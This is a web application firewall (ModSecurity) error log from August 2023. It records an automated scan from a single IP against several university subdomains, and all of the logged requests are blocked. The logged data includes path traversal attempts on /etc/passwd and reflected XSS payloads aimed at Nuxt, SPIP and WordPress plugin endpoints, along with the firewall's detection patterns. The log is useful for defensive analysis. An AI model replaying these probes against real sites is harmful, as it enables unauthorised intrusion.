[Tue Aug 29 11:54:33.614677 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqWwWcAAAAl"]
[Tue Aug 29 11:54:33.782713 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAofnEEAAAAX"]
[Tue Aug 29 11:54:34.561555 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApZHWcAAAAf"]
[Tue Aug 29 11:54:34.580464 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAoz77YAAAAS"]
[Tue Aug 29 11:54:34.586802 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApKax8AAAAZ"]
[Tue Aug 29 11:54:34.601373 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAqTvjkAAAAa"]
[Tue Aug 29 11:54:34.602306 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqRzCwAAAAM"]
[Tue Aug 29 11:54:34.602500 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqci6sAAAAv"]
[Tue Aug 29 11:54:34.603701 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAApXgfgAAAAU"]
[Tue Aug 29 11:54:34.608181 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqdbmEAAAAw"]
[Tue Aug 29 11:54:34.608729 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAoz77cAAAAS"]
[Tue Aug 29 11:54:35.544461 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqY55gAAAAr"]
[Tue Aug 29 11:54:35.548671 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAApgA0QAAAAH"]
[Tue Aug 29 11:54:35.676621 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqdbmMAAAAw"]
[Tue Aug 29 11:54:35.678634 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApa-FAAAAAg"]
[Tue Aug 29 11:54:35.702562 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqRzC4AAAAM"]
[Tue Aug 29 11:54:35.704027 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAofnEcAAAAX"]
[Tue Aug 29 11:54:35.704556 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqQ@uIAAAAB"]
[Tue Aug 29 11:54:35.709664 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqeFPAAAAAx"]
[Tue Aug 29 11:54:35.711261 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApl@BIAAAAo"]
[Tue Aug 29 11:54:35.713512 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAolKicAAAAe"]
[Tue Aug 29 11:54:35.717215 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16C8Co-f0AAApbUVMAAAAh"]
[Tue Aug 29 11:54:35.717679 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAoz77kAAAAS"]
[Tue Aug 29 11:54:35.723917 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqRzC8AAAAM"]
[Tue Aug 29 11:54:36.562741 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16DMCo-f0AAApbUVQAAAAh"]
[Tue Aug 29 11:54:36.649647 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16DMCo-f0AAAqZuZoAAAAs"]
[Tue Aug 29 11:54:37.904196 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAApa-FQAAAAg"]
[Tue Aug 29 11:54:37.983078 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id 